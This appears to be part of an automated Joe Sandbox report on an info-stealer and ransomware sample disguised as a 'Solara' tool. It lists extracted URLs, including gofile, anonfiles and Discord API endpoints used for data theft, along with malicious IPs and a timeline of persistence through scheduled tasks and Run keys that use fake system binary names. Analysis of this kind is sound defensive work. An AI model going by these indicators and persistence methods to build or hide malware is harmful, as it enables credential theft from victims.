                            https://docs.github.com/get-started/accessibility/keyboard-shortcutsSolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Built.exe, 00000003.00000003.2032723653.000001D5E551B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://httpbin.org/Built.exe, 00000003.00000002.2043351840.000001D5E4FA8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sBuilt.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.cl.cam.ac.uk/~mgk25/iso-time.htmlBuilt.exe, 00000003.00000003.1723015073.000001D5E525A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1723076390.000001D5E51D7000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1726133124.000001D5E524B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://github.githubassets.com/assets/element-registry-d3ba3606e12c.jsSolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.ecosia.org/newtab/Built.exe, 00000003.00000003.2032723653.000001D5E551B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://github.com/features/packagesSolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 1%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.com/Pester/Pesterpowershell.exe, 00000015.00000002.1799627258.000001F300228000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 1%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_jsSolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_moduSolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 1%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535Built.exe, 00000003.00000002.2046197420.000001D5E523A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2046197420.000001D5E5120000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://MD8.mozilla.org/1/mBuilt.exe, 00000003.00000002.2054526869.000001D5E58F4000.00000004.00001000.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_jsSolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://bugzilla.moBuilt.exe, 00000003.00000002.2054526869.000001D5E5820000.00000004.00001000.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://github.com/trendingSolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 1%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://api.anonfiles.com/uploadrBuilt.exe, 00000003.00000003.1722583817.000001D5E51D7000.00000004.00000020.00020000.00000000.sdmpfalse
                            • 2%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            http://tools.ietf.org/html/rfc6125#section-6.4.3Built.exe, 00000003.00000002.2054089602.000001D5E5720000.00000004.00001000.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000011.00000002.1868518526.00000269018A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1799627258.000001F300228000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://google.com/mailBuilt.exe, 00000003.00000003.1837956846.000001D5E4FC7000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2043351840.000001D5E4FCA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2043351840.000001D5E4E50000.00000004.00000020.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesBuilt.exe, 00000003.00000002.2056924197.000001D5E5D12000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.2032955728.000001D5E533B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.phys.uu.nl/~vgent/calendar/isocalendar.htmBuilt.exe, 00000003.00000003.1723015073.000001D5E525A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1723076390.000001D5E51D7000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1726133124.000001D5E524B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://api.github.com/_private/browser/errorsSolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.Built.exe, 00000003.00000003.1829183709.000001D5E525A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1856705420.000001D5E525A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2046197420.000001D5E525A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-78ce1c87SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://api.gofile.io/getServerrBuilt.exe, 00000003.00000003.1722583817.000001D5E51D7000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.com/features/discussionsSolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://ocsp.sectigo.com0Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://github.githubassets.com/assets/global-9e9ac94b9f81.cssSolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.githubassets.com/assets/environment-bcaf5ff1a8f7.jsSolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://partner.github.comSolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.githubassets.com/favicons/favicon.pngSolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsNBuilt.exe, 00000003.00000002.2043351840.000001D5E4FA8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://discordapp.com/api/v9/users/Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.githubassets.com/assets/app_assets_modules_github_onfocus_ts-ui_packages_trusted-typeSolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.com/urllib3/urllib3/issues/2920Built.exe, 00000003.00000002.2054089602.000001D5E5720000.00000004.00001000.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://account.bellmedia.cBuilt.exe, 00000003.00000002.2054526869.000001D5E5914000.00000004.00001000.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.com(SolaraBootstrapper.exe, 00000007.00000002.1761345082.00000000029F1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://login.microsoftonline.comBuilt.exe, 00000003.00000002.2054526869.000001D5E586C000.00000004.00001000.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2054526869.000001D5E5914000.00000004.00001000.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://crl.thawte.com/ThawteTimestampingCA.crl0Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://www.zhihu.com/Built.exe, 00000003.00000002.2054526869.000001D5E58B4000.00000004.00001000.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.com/features/copilotSolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.iana.org/time-zones/repository/tz-link.htmlBuilt.exe, 00000003.00000003.1723015073.000001D5E525A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1723155170.000001D5E4FF1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://github.githubassets.com/assets/dark_high_contrast-f4daad25d8cf.cssSolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.githubassets.com/assets/light-efd2f2257c96.cssSolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.githubassets.com/assets/keyboard-shortcuts-dialog-12eb51662ed7.jsSolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.githubassets.com/assets/dark_tritanopia-1911f0cf0db4.cssSolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.githubassets.com/assets/site-73c81d16a7dd.cssSolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://api.gofile.io/getServerBuilt.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-nodSolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.githubassets.com/favicons/favicon.svgSolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngBuilt.exe, 00000003.00000002.2050287577.000001D5E543E000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://cacerts.diBuilt.exe, 00000001.00000003.1690798025.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoBuilt.exe, 00000003.00000003.2032723653.000001D5E551B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.amazon.co.uk/Built.exe, 00000003.00000002.2054526869.000001D5E586C000.00000004.00001000.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngzBuilt.exe, 00000003.00000003.1722583817.000001D5E51D7000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.com/features/codespacesSolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zipKVjy8d2EoqK.exe, 00000000.00000003.1696194497.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, S l r .exe, 00000004.00000000.1696061537.0000000000409000.00000002.00000001.01000000.0000000C.sdmp, S l r .exe, 00000004.00000003.1715340990.000000000055D000.00000004.00000020.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000000.1711320937.00000000004F2000.00000002.00000001.01000000.00000010.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://github.comdSolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B06000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.wykop.pl/Built.exe, 00000003.00000002.2054089602.000001D5E5720000.00000004.00001000.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://twitter.com/Built.exe, 00000003.00000002.2042088940.000001D5E4C3C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2043351840.000001D5E4FA8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://github.githubassets.comSolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.olx.pl/Built.exe, 00000003.00000002.2054526869.000001D5E58B4000.00000004.00001000.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            208.95.112.1
                            ip-api.comUnited States
                            53334TUT-ASUStrue
                            147.185.221.21
                            cash-spoken.gl.at.ply.ggUnited States
                            12087SALSGIVERUStrue
                            185.199.108.133
                            raw.githubusercontent.comNetherlands
                            54113FASTLYUSfalse
                            140.82.121.4
                            github.comUnited States
                            36459GITHUBUSfalse
                            162.159.135.233
                            discordapp.comUnited States
                            13335CLOUDFLARENETUStrue
                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1487977
                            Start date and time:2024-08-05 14:31:09 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 12m 58s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:98
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Critical Process Termination
                            Sample name:Vjy8d2EoqK.exe
                            renamed because original name is a hash value
                            Original Sample Name:A0936899FBF31493BBE5E34DC18A9341.exe
                            Detection:MAL
                            Classification:mal100.rans.troj.adwa.spyw.evad.winEXE@124/73@7/5
                            EGA Information:
                            • Successful, ratio: 36.4%
                            HCA Information:
                            • Successful, ratio: 53%
                            • Number of executed functions: 185
                            • Number of non-executed functions: 226
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): Conhost.exe, WmiPrvSE.exe, schtasks.exe
                            • Excluded IPs from analysis (whitelisted): 142.250.186.67
                            • Excluded domains from analysis (whitelisted): a1009150.xsph.ru, ocsp.digicert.com, slscr.update.microsoft.com, gstatic.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Execution Graph export aborted for target SolaraBootstrapper.exe, PID 7248 because it is empty
                            • Execution Graph export aborted for target comReviewsession.exe, PID 7476 because it is empty
                            • Execution Graph export aborted for target dasHost.exe, PID 7324 because it is empty
                            • Execution Graph export aborted for target dasHost.exe, PID 8064 because it is empty
                            • Execution Graph export aborted for target dwm.exe, PID 8060 because it is empty
                            • Execution Graph export aborted for target powershell.exe, PID 7552 because it is empty
                            • Execution Graph export aborted for target powershell.exe, PID 7848 because it is empty
                            • Not all processes where analyzed, report is missing behavior information
                            • Report creation exceeded maximum time and may have missing disassembly code information.
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Report size getting too big, too many NtCreateFile calls found.
                            • Report size getting too big, too many NtCreateKey calls found.
                            • Report size getting too big, too many NtEnumerateKey calls found.
                            • Report size getting too big, too many NtOpenFile calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            TimeTypeDescription
                            08:32:06API Interceptor17x Sleep call for process: SolaraBootstrapper.exe modified
                            08:32:07API Interceptor3x Sleep call for process: WMIC.exe modified
                            08:32:08API Interceptor127x Sleep call for process: powershell.exe modified
                            08:32:45API Interceptor604800x Sleep call for process: XClient.exe modified
                            13:32:15Task SchedulerRun new task: dasHost path: "C:\Windows\SysWOW64\it-IT\dasHost.exe"
                            13:32:15Task SchedulerRun new task: dasHostd path: "C:\Windows\SysWOW64\it-IT\dasHost.exe"
                            13:32:15Task SchedulerRun new task: dwmd path: "C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe"
                            13:32:15Task SchedulerRun new task: iKSiRODBDWoPAMSDKBDQBFN path: "C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe"
                            13:32:16Task SchedulerRun new task: iKSiRODBDWoPAMSDKBDQBFNi path: "C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe"
                            13:32:17AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run dasHost "C:\Windows\SysWOW64\it-IT\dasHost.exe"
                            13:32:18Task SchedulerRun new task: cmd path: "C:\Windows\addins\cmd.exe"
                            13:32:18Task SchedulerRun new task: cmdc path: "C:\Windows\addins\cmd.exe"
                            13:32:19Task SchedulerRun new task: conhost path: "C:\Windows\apppatch\en-US\conhost.exe"
                            13:32:19Task SchedulerRun new task: conhostc path: "C:\Windows\apppatch\en-US\conhost.exe"
                            13:32:19Task SchedulerRun new task: dwm path: "C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe"
                            13:32:19Task SchedulerRun new task: powershell path: "C:\Recovery\powershell.exe"
                            13:32:19Task SchedulerRun new task: powershellp path: "C:\Recovery\powershell.exe"
                            13:32:25AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run iKSiRODBDWoPAMSDKBDQBFN "C:\Program Files (x86)\jdownloader\iKSiRODBDWoPAMSDKBDQBFN.exe"
                            13:32:34AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe"
                            13:32:42AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run powershell "C:\Recovery\powershell.exe"
                            13:32:43Task SchedulerRun new task: XClient path: C:\Users\user\AppData\Roaming\XClient.exe
                            13:32:50AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run cmd "C:\Windows\addins\cmd.exe"
                            13:32:58AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Windows\apppatch\en-US\conhost.exe"
                            13:33:07AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run XClient C:\Users\user\AppData\Roaming\XClient.exe
                            13:33:15AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run dasHost "C:\Windows\SysWOW64\it-IT\dasHost.exe"
                            13:33:23AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run iKSiRODBDWoPAMSDKBDQBFN "C:\Program Files (x86)\jdownloader\iKSiRODBDWoPAMSDKBDQBFN.exe"
